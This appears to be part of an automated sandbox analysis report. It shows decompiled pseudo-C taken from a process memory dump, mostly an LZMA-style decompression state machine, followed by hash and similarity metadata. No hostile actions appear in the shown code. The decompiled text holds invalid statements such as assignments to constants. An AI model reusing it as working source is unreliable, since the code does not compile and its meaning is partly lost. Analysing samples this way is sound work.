              														_t98 = __ebp - 0x38;
              														 *_t98 =  *(__ebp - 0x38) - 6;
              														__eflags =  *_t98;
              													} else {
              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              													}
              												} else {
              													 *(__ebp - 0x38) = 0;
              												}
              												__eflags =  *(__ebp - 0x34) - __edx;
              												if( *(__ebp - 0x34) == __edx) {
              													__ebx = 0;
              													__ebx = 1;
              													goto L61;
              												} else {
              													__eax =  *(__ebp - 0x14);
              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              													__eflags = __eax -  *(__ebp - 0x74);
              													if(__eax >=  *(__ebp - 0x74)) {
              														__eax = __eax +  *(__ebp - 0x74);
              														__eflags = __eax;
              													}
              													__ecx =  *(__ebp - 8);
              													__ebx = 0;
              													__ebx = 1;
              													__al =  *((intOrPtr*)(__eax + __ecx));
              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              													goto L41;
              												}
              											case 7:
              												goto L0;
              											case 8:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 4);
              													__ecx =  *(__ebp - 0x38);
              													 *(__ebp - 0x84) = 0xa;
              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              												} else {
              													__eax =  *(__ebp - 0x38);
              													__ecx =  *(__ebp - 4);
              													__eax =  *(__ebp - 0x38) + 0xf;
              													 *(__ebp - 0x84) = 9;
              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              												}
              												while(1) {
              													L132:
              													 *(_t621 - 0x54) = _t614;
              													goto L133;
              												}
              											case 9:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													goto L89;
              												}
              												__eflags =  *(__ebp - 0x60);
              												if( *(__ebp - 0x60) == 0) {
              													goto L171;
              												}
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												_t258 =  *(__ebp - 0x38) - 7 >= 0;
              												__eflags = _t258;
              												0 | _t258 = _t258 + _t258 + 9;
              												 *(__ebp - 0x38) = _t258 + _t258 + 9;
              												goto L75;
              											case 0xa:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 4);
              													__ecx =  *(__ebp - 0x38);
              													 *(__ebp - 0x84) = 0xb;
              													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              													while(1) {
              														L132:
              														 *(_t621 - 0x54) = _t614;
              														goto L133;
              													}
              												}
              												__eax =  *(__ebp - 0x28);
              												goto L88;
              											case 0xb:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__ecx =  *(__ebp - 0x24);
              													__eax =  *(__ebp - 0x20);
              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
              												} else {
              													__eax =  *(__ebp - 0x24);
              												}
              												__ecx =  *(__ebp - 0x28);
              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
              												L88:
              												__ecx =  *(__ebp - 0x2c);
              												 *(__ebp - 0x2c) = __eax;
              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              												L89:
              												__eax =  *(__ebp - 4);
              												 *(__ebp - 0x80) = 0x15;
              												__eax =  *(__ebp - 4) + 0xa68;
              												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              												goto L68;
              											case 0xc:
              												L99:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xc;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t334 = __ebp - 0x70;
              												 *_t334 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t334;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												__eax =  *(__ebp - 0x2c);
              												goto L101;
              											case 0xd:
              												L37:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xd;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t122 = __ebp - 0x70;
              												 *_t122 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t122;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L39:
              												__eax =  *(__ebp - 0x40);
              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              													goto L48;
              												}
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													goto L54;
              												}
              												L41:
              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              												__ecx =  *(__ebp - 0x58);
              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              												 *(__ebp - 0x48) = __eax;
              												__eax = __eax + 1;
              												__eax = __eax << 8;
              												__eax = __eax + __ebx;
              												__esi =  *(__ebp - 0x58) + __eax * 2;
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edx = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													 *(__ebp - 0x40) = 1;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													__ebx = __ebx + __ebx + 1;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edx;
              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L39;
              												} else {
              													goto L37;
              												}
              											case 0xe:
              												L46:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xe;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t156 = __ebp - 0x70;
              												 *_t156 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t156;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												while(1) {
              													L48:
              													__eflags = __ebx - 0x100;
              													if(__ebx >= 0x100) {
              														break;
              													}
              													__eax =  *(__ebp - 0x58);
              													__edx = __ebx + __ebx;
              													__ecx =  *(__ebp - 0x10);
              													__esi = __edx + __eax;
              													__ecx =  *(__ebp - 0x10) >> 0xb;
              													__ax =  *__esi;
              													 *(__ebp - 0x54) = __esi;
              													__edi = __ax & 0x0000ffff;
              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              													__eflags =  *(__ebp - 0xc) - __ecx;
              													if( *(__ebp - 0xc) >= __ecx) {
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              														__cx = __ax;
              														_t170 = __edx + 1; // 0x1
              														__ebx = _t170;
              														__cx = __ax >> 5;
              														__eflags = __eax;
              														 *__esi = __ax;
              													} else {
              														 *(__ebp - 0x10) = __ecx;
              														0x800 = 0x800 - __edi;
              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              														__ebx = __ebx + __ebx;
              														 *__esi = __cx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													 *(__ebp - 0x44) = __ebx;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														continue;
              													} else {
              														goto L46;
              													}
              												}
              												L54:
              												_t173 = __ebp - 0x34;
              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              												__eflags =  *_t173;
              												goto L55;
              											case 0xf:
              												L58:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0xf;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t203 = __ebp - 0x70;
              												 *_t203 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t203;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L60:
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													L55:
              													__al =  *(__ebp - 0x44);
              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              													goto L56;
              												}
              												L61:
              												__eax =  *(__ebp - 0x58);
              												__edx = __ebx + __ebx;
              												__ecx =  *(__ebp - 0x10);
              												__esi = __edx + __eax;
              												__ecx =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													_t217 = __edx + 1; // 0x1
              													__ebx = _t217;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L60;
              												} else {
              													goto L58;
              												}
              											case 0x10:
              												L109:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0x10;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t365 = __ebp - 0x70;
              												 *_t365 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t365;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												goto L111;
              											case 0x11:
              												L68:
              												_t614 =  *(_t621 - 0x58);
              												 *(_t621 - 0x84) = 0x12;
              												while(1) {
              													L132:
              													 *(_t621 - 0x54) = _t614;
              													goto L133;
              												}
              											case 0x12:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 0x58);
              													 *(__ebp - 0x84) = 0x13;
              													__esi =  *(__ebp - 0x58) + 2;
              													while(1) {
              														L132:
              														 *(_t621 - 0x54) = _t614;
              														goto L133;
              													}
              												}
              												__eax =  *(__ebp - 0x4c);
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              												__ecx =  *(__ebp - 0x58);
              												__eax =  *(__ebp - 0x4c) << 4;
              												__eflags = __eax;
              												__eax =  *(__ebp - 0x58) + __eax + 4;
              												goto L130;
              											case 0x13:
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													_t469 = __ebp - 0x58;
              													 *_t469 =  *(__ebp - 0x58) + 0x204;
              													__eflags =  *_t469;
              													 *(__ebp - 0x30) = 0x10;
              													 *(__ebp - 0x40) = 8;
              													L144:
              													 *(__ebp - 0x7c) = 0x14;
              													goto L145;
              												}
              												__eax =  *(__ebp - 0x4c);
              												__ecx =  *(__ebp - 0x58);
              												__eax =  *(__ebp - 0x4c) << 4;
              												 *(__ebp - 0x30) = 8;
              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              												L130:
              												 *(__ebp - 0x58) = __eax;
              												 *(__ebp - 0x40) = 3;
              												goto L144;
              											case 0x14:
              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              												__eax =  *(__ebp - 0x80);
              												 *(_t621 - 0x88) = _t542;
              												goto L1;
              											case 0x15:
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              												__al = __al & 0x000000fd;
              												__eax = (__eflags >= 0) - 1 + 0xb;
              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              												goto L120;
              											case 0x16:
              												__eax =  *(__ebp - 0x30);
              												__eflags = __eax - 4;
              												if(__eax >= 4) {
              													_push(3);
              													_pop(__eax);
              												}
              												__ecx =  *(__ebp - 4);
              												 *(__ebp - 0x40) = 6;
              												__eax = __eax << 7;
              												 *(__ebp - 0x7c) = 0x19;
              												 *(__ebp - 0x58) = __eax;
              												goto L145;
              											case 0x17:
              												L145:
              												__eax =  *(__ebp - 0x40);
              												 *(__ebp - 0x50) = 1;
              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
              												goto L149;
              											case 0x18:
              												L146:
              												__eflags =  *(__ebp - 0x6c);
              												if( *(__ebp - 0x6c) == 0) {
              													 *(__ebp - 0x88) = 0x18;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x70);
              												__eax =  *(__ebp - 0xc);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												_t484 = __ebp - 0x70;
              												 *_t484 =  *(__ebp - 0x70) + 1;
              												__eflags =  *_t484;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              												L148:
              												_t487 = __ebp - 0x48;
              												 *_t487 =  *(__ebp - 0x48) - 1;
              												__eflags =  *_t487;
              												L149:
              												__eflags =  *(__ebp - 0x48);
              												if( *(__ebp - 0x48) <= 0) {
              													__ecx =  *(__ebp - 0x40);
              													__ebx =  *(__ebp - 0x50);
              													0 = 1;
              													__eax = 1 << __cl;
              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
              													__eax =  *(__ebp - 0x7c);
              													 *(__ebp - 0x44) = __ebx;
              													while(1) {
              														 *(_t621 - 0x88) = _t542;
              														goto L1;
              													}
              												}
              												__eax =  *(__ebp - 0x50);
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              												__eax =  *(__ebp - 0x58);
              												__esi = __edx + __eax;
              												 *(__ebp - 0x54) = __esi;
              												__ax =  *__esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													__cx = __ax >> 5;
              													__eax = __eax - __ecx;
              													__edx = __edx + 1;
              													__eflags = __edx;
              													 *__esi = __ax;
              													 *(__ebp - 0x50) = __edx;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													goto L148;
              												} else {
              													goto L146;
              												}
              											case 0x19:
              												__eflags = __ebx - 4;
              												if(__ebx < 4) {
              													 *(__ebp - 0x2c) = __ebx;
              													L119:
              													_t393 = __ebp - 0x2c;
              													 *_t393 =  *(__ebp - 0x2c) + 1;
              													__eflags =  *_t393;
              													L120:
              													__eax =  *(__ebp - 0x2c);
              													__eflags = __eax;
              													if(__eax == 0) {
              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              														goto L170;
              													}
              													__eflags = __eax -  *(__ebp - 0x60);
              													if(__eax >  *(__ebp - 0x60)) {
              														goto L171;
              													}
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              													__eax =  *(__ebp - 0x30);
              													_t400 = __ebp - 0x60;
              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              													__eflags =  *_t400;
              													goto L123;
              												}
              												__ecx = __ebx;
              												__eax = __ebx;
              												__ecx = __ebx >> 1;
              												__eax = __ebx & 0x00000001;
              												__ecx = (__ebx >> 1) - 1;
              												__al = __al | 0x00000002;
              												__eax = (__ebx & 0x00000001) << __cl;
              												__eflags = __ebx - 0xe;
              												 *(__ebp - 0x2c) = __eax;
              												if(__ebx >= 0xe) {
              													__ebx = 0;
              													 *(__ebp - 0x48) = __ecx;
              													L102:
              													__eflags =  *(__ebp - 0x48);
              													if( *(__ebp - 0x48) <= 0) {
              														__eax = __eax + __ebx;
              														 *(__ebp - 0x40) = 4;
              														 *(__ebp - 0x2c) = __eax;
              														__eax =  *(__ebp - 4);
              														__eax =  *(__ebp - 4) + 0x644;
              														__eflags = __eax;
              														L108:
              														__ebx = 0;
              														 *(__ebp - 0x58) = __eax;
              														 *(__ebp - 0x50) = 1;
              														 *(__ebp - 0x44) = 0;
              														 *(__ebp - 0x48) = 0;
              														L112:
              														__eax =  *(__ebp - 0x40);
              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              															_t391 = __ebp - 0x2c;
              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
              															__eflags =  *_t391;
              															goto L119;
              														}
              														__eax =  *(__ebp - 0x50);
              														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              														__eax =  *(__ebp - 0x58);
              														__esi = __edi + __eax;
              														 *(__ebp - 0x54) = __esi;
              														__ax =  *__esi;
              														__ecx = __ax & 0x0000ffff;
              														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              														__eflags =  *(__ebp - 0xc) - __edx;
              														if( *(__ebp - 0xc) >= __edx) {
              															__ecx = 0;
              															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              															__ecx = 1;
              															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              															__ebx = 1;
              															__ecx =  *(__ebp - 0x48);
              															__ebx = 1 << __cl;
              															__ecx = 1 << __cl;
              															__ebx =  *(__ebp - 0x44);
              															__ebx =  *(__ebp - 0x44) | __ecx;
              															__cx = __ax;
              															__cx = __ax >> 5;
              															__eax = __eax - __ecx;
              															__edi = __edi + 1;
              															__eflags = __edi;
              															 *(__ebp - 0x44) = __ebx;
              															 *__esi = __ax;
              															 *(__ebp - 0x50) = __edi;
              														} else {
              															 *(__ebp - 0x10) = __edx;
              															0x800 = 0x800 - __ecx;
              															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              															 *__esi = __dx;
              														}
              														__eflags =  *(__ebp - 0x10) - 0x1000000;
              														if( *(__ebp - 0x10) >= 0x1000000) {
              															L111:
              															_t368 = __ebp - 0x48;
              															 *_t368 =  *(__ebp - 0x48) + 1;
              															__eflags =  *_t368;
              															goto L112;
              														} else {
              															goto L109;
              														}
              													}
              													__ecx =  *(__ebp - 0xc);
              													__ebx = __ebx + __ebx;
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              													 *(__ebp - 0x44) = __ebx;
              													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              														__ecx =  *(__ebp - 0x10);
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              														__ebx = __ebx | 0x00000001;
              														__eflags = __ebx;
              														 *(__ebp - 0x44) = __ebx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														L101:
              														_t338 = __ebp - 0x48;
              														 *_t338 =  *(__ebp - 0x48) - 1;
              														__eflags =  *_t338;
              														goto L102;
              													} else {
              														goto L99;
              													}
              												}
              												__edx =  *(__ebp - 4);
              												__eax = __eax - __ebx;
              												 *(__ebp - 0x40) = __ecx;
              												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              												goto L108;
              											case 0x1a:
              												L56:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													 *(__ebp - 0x88) = 0x1a;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x68);
              												__al =  *(__ebp - 0x5c);
              												__edx =  *(__ebp - 8);
              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              												 *( *(__ebp - 0x68)) = __al;
              												__ecx =  *(__ebp - 0x14);
              												 *(__ecx +  *(__ebp - 8)) = __al;
              												__eax = __ecx + 1;
              												__edx = 0;
              												_t192 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t192;
              												goto L79;
              											case 0x1b:
              												L75:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													 *(__ebp - 0x88) = 0x1b;
              													goto L170;
              												}
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__edx =  *(__ebp - 8);
              												__cl =  *(__eax + __edx);
              												__eax =  *(__ebp - 0x14);
              												 *(__ebp - 0x5c) = __cl;
              												 *(__eax + __edx) = __cl;
              												__eax = __eax + 1;
              												__edx = 0;
              												_t274 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t274;
              												__eax =  *(__ebp - 0x68);
              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												_t283 = __ebp - 0x64;
              												 *_t283 =  *(__ebp - 0x64) - 1;
              												__eflags =  *_t283;
              												 *( *(__ebp - 0x68)) = __cl;
              												L79:
              												 *(__ebp - 0x14) = __edx;
              												goto L80;
              											case 0x1c:
              												while(1) {
              													L123:
              													__eflags =  *(__ebp - 0x64);
              													if( *(__ebp - 0x64) == 0) {
              														break;
              													}
              													__eax =  *(__ebp - 0x14);
              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              													__eflags = __eax -  *(__ebp - 0x74);
              													if(__eax >=  *(__ebp - 0x74)) {
              														__eax = __eax +  *(__ebp - 0x74);
              														__eflags = __eax;
              													}
              													__edx =  *(__ebp - 8);
              													__cl =  *(__eax + __edx);
              													__eax =  *(__ebp - 0x14);
              													 *(__ebp - 0x5c) = __cl;
              													 *(__eax + __edx) = __cl;
              													__eax = __eax + 1;
              													__edx = 0;
              													_t414 = __eax %  *(__ebp - 0x74);
              													__eax = __eax /  *(__ebp - 0x74);
              													__edx = _t414;
              													__eax =  *(__ebp - 0x68);
              													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              													__eflags =  *(__ebp - 0x30);
              													 *( *(__ebp - 0x68)) = __cl;
              													 *(__ebp - 0x14) = _t414;
              													if( *(__ebp - 0x30) > 0) {
              														continue;
              													} else {
              														L80:
              														 *(__ebp - 0x88) = 2;
              														goto L1;
              													}
              												}
              												 *(__ebp - 0x88) = 0x1c;
              												goto L170;
              										}
              									}
              									L171:
              									_t544 = _t543 | 0xffffffff;
              									goto L172;
              								}
              							}
              						}
              					}
              					goto L1;
              				}
              			}















              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
              • Instruction ID: b4a429368d408adc735ccef7c69d02ca95e21b2dffe456e9be617d596e32585a
              • Opcode Fuzzy Hash: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
              • Instruction Fuzzy Hash: 44711371D04228CFDF28CFA8C954BADBBB1FB44305F15806AD856BB281D7386986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00407018() {
              				unsigned short _t531;
              				signed int _t532;
              				void _t533;
              				signed int _t534;
              				signed int _t535;
              				signed int _t565;
              				signed int _t568;
              				signed int _t589;
              				signed int* _t606;
              				void* _t613;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t613 - 0x40) != 0) {
              						 *(_t613 - 0x84) = 0xb;
              						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
              						goto L132;
              					} else {
              						__eax =  *(__ebp - 0x28);
              						L88:
              						 *(__ebp - 0x2c) = __eax;
              						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              						L89:
              						__eax =  *(__ebp - 4);
              						 *(__ebp - 0x80) = 0x15;
              						__eax =  *(__ebp - 4) + 0xa68;
              						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              						L69:
              						 *(__ebp - 0x84) = 0x12;
              						while(1) {
              							L132:
              							 *(_t613 - 0x54) = _t606;
              							while(1) {
              								L133:
              								_t531 =  *_t606;
              								_t589 = _t531 & 0x0000ffff;
              								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
              								if( *(_t613 - 0xc) >= _t565) {
              									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
              									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
              									 *(_t613 - 0x40) = 1;
              									_t532 = _t531 - (_t531 >> 5);
              									 *_t606 = _t532;
              								} else {
              									 *(_t613 - 0x10) = _t565;
              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              									 *_t606 = (0x800 - _t589 >> 5) + _t531;
              								}
              								if( *(_t613 - 0x10) >= 0x1000000) {
